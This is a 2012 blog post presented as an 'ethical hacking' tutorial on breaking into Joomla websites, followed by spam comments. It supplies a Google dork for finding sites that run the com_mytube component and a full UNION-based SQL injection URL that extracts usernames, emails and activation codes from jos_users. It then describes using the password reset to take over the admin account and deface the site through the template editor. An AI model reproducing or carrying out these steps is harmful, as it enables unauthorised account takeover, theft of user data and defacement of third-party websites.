Editor Picks

Welcome to ABHIJEET VISHEN's Blogger Register YourSelf For Ethical Hacking Classes To Be an Expert & Win Prizes"    Register Your Self to Learn Ethical Hacking,Hardware & Networking,HTML,DOT NET,PHP

Tuesday, 12 June 2012

Hacking Joomla Website


Hacking Joomla Website

Hey all today i will tell you all how to hack joomla websites.Ok so thereare are different ways to hack a Joomla based website ...But today i will tell you all one of the finest way to hack Joomla websites.


Introduction To Joomla


Joomla as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish___!!!!!!!

But people still hacked sites that use Joomla as Content Management System?

Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules made by that other developers are weak spots and thus make it vulnerable and hackable.

                                                         Finding Exploit and Target

First Of all you input this

Google Dork :

inurl:"option=com_mytube"

enter this dork in Google search box...

Next is injecting the target

See for this URL:

http://targetsite.com/index.php?option=com_mytube&Itemid=88...

Now You have to replace the url something like below

http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
If our target site is vulnerable then we can see something like below image




In above image we can see username, email and activation code.

Now let this page opened and open new page.

                                                       Admin password reset

Go to:
http://www.targetsite.com/index.php?option=com_user&view=reset
This is standard Joomla query for password reset request

                    
Ok now type the email adress found in above steps and submit it
The activation code should be resetted.

Return to the first page, refresh the page and take the new activation code.

Paste him in the token and press Submit.

problem with token_______!!!!!!

UPDATE: Joomla! 1.5.16 now hashes the reset token

if you see a thing like :$1$14411: after the activation code, it will not work.
Admin Login

If you done everything ok, your Password page will load. Enter your new password...


After that go to:

http://www.targetsite.com/administrator/




Standard Joomla portal content management system

Enter the username  and your new password, click on Login

Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

Now you are successfully done.

7 comments:

Zinavo Tech said...

One of the best features of Joomla for many companies is access to thousands of customizable extensions.
Web Designing Bangalore | Website Development Company Bangalore

Web Developing Services said...

I can not believes in this information of this blog to hack the Joomla websites.Is this really working to hack the websites???
Top Web Design Company | Website Development Company

Bangaloreweb guru said...

Magento is the leading open source e-commerce software platform mostly trusted by developers. For effective web design to deliver excellent website for customer
Website Designing Company Bangalore | Website Development Company Bangalore

Web Developing Services said...

Its very difficult to hack the joomla website.Because it is more securable development platform.
Web Design Companies | Website Design Companies

Unknown said...

I think hacking the joomla website is very difficult.Because it have more securable things and functionality.
Responsive Web Design Company | Responsive Design Companies

Sarkari Job said...

Hacking zoomla is difficult but not so difficult We are a team of highly experienced team members who mainly designs websites , application and analyze vulnerabilities for any assistance regarding web development , software development , application development , content writing , seo visit www.wavemaza.com

Unknown said...

What can be so difficult about Joomla, they said. You’ve already worked with WordPress, they said.
I was like: “Okay, I’ll do the one-click install like a boss and get everything set-up in no time.” Web Design Bangalore

Post a Comment